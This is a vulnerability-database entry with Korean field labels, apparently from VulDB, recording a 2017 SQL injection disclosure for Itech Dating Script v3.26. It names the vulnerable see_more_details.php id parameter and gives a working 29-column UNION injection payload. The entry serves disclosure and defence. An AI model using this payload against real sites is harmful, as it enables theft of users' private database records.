| 제목 | Itech Dating Script v3.26 – SQL Injection |
|---|
| 설명 | Introduction
Exploit Title: Itech Dating Script v3.26 – SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/dating-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Itech Dating Script v3.26 is a powerful platform to launch a dating portal. This product is extremely popular among the new webmasters.
Type of vulnerability:
An SQL Injection vulnerability in Itech Dating Script v3.26 allows attackers to read
arbitrary data from the database.
Vulnerability:
URL : http://localhost/see_more_details.php?id=40[payload]
Parameter: id (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 29 columns
Payload: id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6a71,0x61777373447a7141494372496e6c63596f6f62586e534e544b53656b7077534e704e755266517347,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nZhVs |
|---|
| 사용자 | KAAN KAMIS (UID 213) |
|---|
| 제출 | 2017. 01. 30. PM 12:44 (9 연령 ago) |
|---|
| 모더레이션 | 2017. 01. 30. PM 09:51 (9 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 96283 [Itech Dating Script 3.26 /see_more_details.php 아이디 SQL 주입] |
|---|
| 포인트들 | 17 |
|---|